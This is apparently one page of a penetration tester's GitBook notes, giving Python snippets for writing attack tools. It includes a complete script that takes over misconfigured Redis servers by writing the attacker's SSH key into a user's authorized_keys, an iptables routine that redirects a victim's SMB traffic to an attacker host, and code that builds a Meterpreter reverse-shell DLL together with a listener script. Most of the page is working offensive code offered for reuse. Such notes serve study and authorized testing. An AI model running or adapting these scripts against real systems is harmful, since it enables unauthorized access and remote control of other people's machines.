Notes
  • Enumeration
  • Shells
    • Interactive TTY Shell
    • Spawn a Shell
    • Reverse Shells
  • Buffer OverFlow
    • Do Stack Buffer Overflow Good
    • Server-Memc.exe
  • Tools
    • hydra
    • Hashcat
    • SSH tricks
    • Git
    • pspy
    • Impacket-tools
    • Evil-winrm
    • Crackmapexec
    • Empire
    • SQLMap
    • msfvenon
    • Mimikatz
    • Docker
    • Weevely
    • gpp-decrypt
    • PLink.exe
    • john
    • wfuzz
    • Searchsploit
  • Python
    • Useful Libraries
    • Python Tricks
    • Using fstrings Python3
  • PHP
    • Web shells
    • Bypassing Dangerous PHP Functions
    • Exploiting RFI in a PHP application and bypassing remote URL inclusion restrict
    • PHP - LFI and RFI
  • SQL Injection
    • Getting a Shell
    • Enable xp_cmdshell
    • Shell From PHPMyAdmin
  • OpenSSL - CheatSheet
  • Windows
    • TeamViewer Decrypt
    • Commando VM
    • PrivEsc
      • Bypass AppLocker
      • Disable Windows Defender
      • Abusing Services
      • Blogs About Windows
      • Guides
      • Powershell Runas
      • Living Off The Land Binaries and Scripts
      • DLL Injection
      • Common Windows PrivEsc
      • Windows PrivEsc Exploits
      • Abusing Files Permissions
      • Interesting Files
      • File Transfer Methods
      • Bloodhound
      • Potatos and Tokens
        • PrintSpoofer Win10 - Server 2016/2019
      • SessionGopher.ps1
      • Sherlock.ps1
      • Windows - PrivEsc Scripts
        • Windows Exploit Suggester
    • Powershell
    • Anti-Virus Evasion
    • Post-Exploitation
      • Extract Windows Hashes Offline
      • Dumping Domain Password Hashes
    • Vulnerabilities
      • MS15-051
      • MS17-010
      • MS08-067
    • Active Directory
      • Get-DomainSPN Ticket
      • Kerberos
      • Bloodhound
      • DNS Admin to SYSTEM
      • DC Sync Attack
      • Escalating privileges with ACLs in Active Directory
      • How SMB Relay Works
      • Practical Guide to NTLM Relaying
      • Microsoft Exchange – ACL
  • Linux
    • PrivEsc
      • LXE to root
      • MySQL as root
      • Logrotate PrivEsc 3.15.1
      • Guides
      • SSH Tricks
      • Abusing Unix Wildcards
      • Linux - PrivEsc Scripts
    • Kernel Exploits
  • OSCP
    • Resources & Guides
      • WordPress PrivEsc
    • HackTheBox - Writeups
      • HTB - Networked
      • HTB - Cronos
      • HTB - Nibbles
      • HTB - LaCasaDePapel
      • HTB - Sense
      • HTB - October
      • HTB - Brainfuck
      • HTB - Mirai
      • HTB - Blocky
      • HTB - Teacher
      • HTB - Tally
      • HTB - Bank
      • HTB - Jeeves
      • HTB - Silo
      • HTB - Bastard
      • HTB - Legacy
      • HTB - Heist
      • HTB - Active
      • HTB - Bastion
      • HTB - Haystack
      • HTB - Bashed
      • HTB - Blue
      • HTB - Tenten
      • HTB - Artic
      • HTB - Bounty
      • HTB - Jerry
  • CTF
    • TryHackMe Writeups
      • TryHackMe - Tempus Fugit Durius
      • TryHackMe - Jack
    • Tools and Resources
Powered by GitBook
On this page

Python

Sample code that can be useful when developing a tool

Sample code of using argparse library

import argparse

arg_parser = argparse.ArgumentParser(description='Webmin 1.910 - Remote Code Execution using, python script')
arg_parser.add_argument('--rhost', dest='rhost', help='Ip address of the webmin server', type=str, required=True)
arg_parser.add_argument("--rport", dest="rport", type=int, help="target webmin port, default 10000", default=10000)
arg_parser.add_argument('--lhost', dest='lhost', help='Local ip address to listen for the reverse shell', type=str, required=True)
arg_parser.add_argument("--lport", dest="lport", type=int, help="The Bind port for the reverse shell\n Default is 4444", default=4444)
arg_parser.add_argument('-u','--user', dest='user', help='The username to use for authentication\n By default is admin', default='admin', type=str)
arg_parser.add_argument('-p','--password', dest='password', help='The password to use for authentication', required=True, type=str)
arg_parser.add_argument('-t','--TARGETURI', dest='targeturi', help='Base path for Webmin application. By default set to "/"', default='/',type=str)
arg_parser.add_argument('-s','--SSL', dest='ssl', help='Negotiate SSL/TLS for outgoing connections. By default ssl is set to False', default='False',type=str)  

args = arg_parser.parse_args()

Sample code to use color to the results

from termcolor import colored


print colored('****************************** Webmin 1.910 Exploit By roughiz*******************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('*********************************************************************************************', "blue")
print colored('****************************** Retrieve Cookies sid *****************************************', "blue")

Base64

data = "this is some data"
data.encode('base64')

Sample code to generate ssh keys and exploit Redis server

import os
import os.path
from sys import argv
from termcolor import colored


script, ip_address, username = argv


PATH='/usr/bin/redis-cli'
PATH1='/usr/local/bin/redis-cli'

def ssh_connection():
	shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username+"@"+ip_address
	os.system(shell)

if os.path.isfile(PATH) or os.path.isfile(PATH1):
	try:
    		print colored('\t*******************************************************************', "green")
    		print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green")
    		print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid"                                ', "green")
		print colored('\t*******************************************************************', "green")
		print "\n"
		print colored("\t SSH Keys Need to be Generated", 'blue')
		os.system('ssh-keygen -t rsa -C \"acid_creative\"')
		print colored("\t Keys Generated Successfully", "blue")
		os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo  \'\r\n\') > $HOME/.ssh/public_key.txt")
		cmd = "redis-cli -h " + ip_address + ' flushall'
		cmd1 = "redis-cli -h " + ip_address
		os.system(cmd)
		cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " +  ip_address + ' -x set cracklist'
		os.system(cmd2)
		cmd3 = cmd1 + ' config set dbfilename "backup.db" '
		cmd4 = cmd1 + ' config set  dir' + " /home/"+username+"/.ssh/"
		cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
		cmd6 = cmd1 + ' save'
		os.system(cmd3)
		os.system(cmd4)
		os.system(cmd5)
		os.system(cmd6)
		print colored("\tYou'll get shell in sometime..Thanks for your patience", "green")
		ssh_connection()

	except:
		print "Something went wrong"
else:
	print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")

Sample code using the os module to execute iptables command

def iptables_config(targetIP, hostIP):
    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))  
    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')

Sample using os.system to interact with msfvenon

def generatePayload(lhost, lport):
    print("generating payload(s) and metasploit resource file")
    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
    os.system(msfDll)
    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)  
    print("metasploit resource script: %s" % msfResource)
    print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
    
    file = open("meta_resource.rc", "w+")
    file.write(msfResource)
    file.close()

PreviousSearchsploitNextUseful Libraries

Last updated 5 years ago